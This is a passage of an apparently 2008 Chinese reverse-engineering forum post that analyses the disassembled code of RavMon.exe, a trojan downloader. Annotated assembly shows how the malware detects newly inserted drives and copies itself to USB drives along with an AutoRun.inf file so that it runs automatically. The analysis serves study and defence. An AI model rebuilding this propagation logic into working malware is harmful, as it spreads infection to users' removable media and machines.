004014D0 .>lea edx, dword ptr [esp+300] ; |
004014D7 .>push edx ; |FileName
004014D8 .>push 00409200 ; |Operation = "open"
004014DD .>push eax ; |hWnd
004014DE .>call dword ptr [40914C] ; \ShellExecuteA
004014E4 .>jmp 00401590
004014E9 >>cmp eax, 219
004014EE .>je short 00401514
下面是处理WM_DEVICECHANGE的消息
00401514 >>cmp dword ptr [esp+50C], 8000 ; Case 219 (WM_DEVICECHANGE) of
switch 0040101B
0040151F .>jnz short 00401590
00401521 .>mov ecx, dword ptr [esp+510]
00401528 .>mov edx, dword ptr [ecx+C]
0040152B .>push edx
0040152C .>mov dword ptr [esp+14], 0
00401534 .>call 00401CC0
00401539 .>lea edi, dword ptr [esp+14]
0040153D .>add esp, 4
00401540 .>mov byte ptr [esp+10], al
00401544 .>dec edi
00401545 >>mov al, byte ptr [edi+1]
00401548 .>inc edi
00401549 .>test al, al
0040154B .>jnz short 00401545
0040154D .>mov ax, word ptr [4091FC]
00401553 .>mov cl, byte ptr [4091FE]
00401559 .>lea edx, dword ptr [esp+10]
0040155D .>mov word ptr [edi], ax
00401560 .>push edx ; /RootPathName
00401561 .>mov byte ptr [edi+2], cl ; |
00401564 .>call dword ptr [4090D0] ; \GetDriveTypeA
0040156A .>sub eax, 2 ; Switch (cases 2..3)
0040156D .>je short 0040157E
0040156F .>dec eax
00401570 .>jnz short 00401590
00401572 .>push 0040B858 ; Case 3 of switch 0040156A
00401577 .>lea eax, dword ptr [esp+14]
0040157B .>push eax
0040157C .>jmp short 00401588
0040157E >>push 0040B858 ; Case 2 of switch 0040156A
00401583 .>lea ecx, dword ptr [esp+14]
00401587 .>push ecx
00401588 >>call 00401CE0 ;把病毒文件复制到U盘,并生成AutoRun.inf文件使U盘的病毒自动运
行
0040158D .>add esp, 8
00401590 >>xor eax, eax ; Default case of switch 0040156A
00401592 >>mov ecx, dword ptr [esp+4FC]
00401599 .>pop edi
0040159A .>pop esi
0040159B .>pop ebp
0040159C .>pop ebx
0040159D .>call 00403279
004015A2 .>add esp, 4F0
004015A8 .>retn 10
病毒文件的具体运行流程请看petnt大侠发表的“简单病毒RavMon.exe的分析”(
http://bbs.pediy.com/showthread.php?t=76310)一文,其附件图文并茂,里面已经说得十分详细。
- 标 题:木马下载器RavMon.exe病毒文件汇编源码分析
- 作 者:newjueqi
- 时 间:2008-11-12 15:55
- 链 接:http://bbs.pediy.com/showthread.php?t=76544